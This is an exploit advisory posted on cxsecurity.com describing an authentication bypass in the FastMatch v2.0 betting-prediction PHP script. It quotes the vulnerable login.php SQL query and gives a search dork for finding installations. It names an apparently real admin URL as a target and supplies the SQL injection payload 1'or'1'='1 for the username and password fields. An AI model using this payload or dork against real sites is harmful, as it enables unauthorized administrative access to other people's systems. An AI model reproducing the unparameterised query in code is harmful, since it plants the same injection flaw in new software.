FastMatch v2.0 İddaa Tahmin Scripti auth by pass vulnerability

2018.03.02
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

====================================================================================== | # Title : FastMatch v2.0 İddaa Tahmin Scripti auth by pass vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version : v2.0 | # Vendor : http://wmscripti.com/php-scriptler/fastmatch-iddaa-tahmin-scripti.html | # Dork : "FastMatch | İddaa Tahminleri Beta" ====================================================================================== poc : login.php line 9 : $bul = mysql_query("select * from admin where kadi='$user' && sifre='$pass'"); http://v2.zkulubu.com/admin/ user : 1'or'1'='1 pass : 1'or'1'='1 Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | | | =======================================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top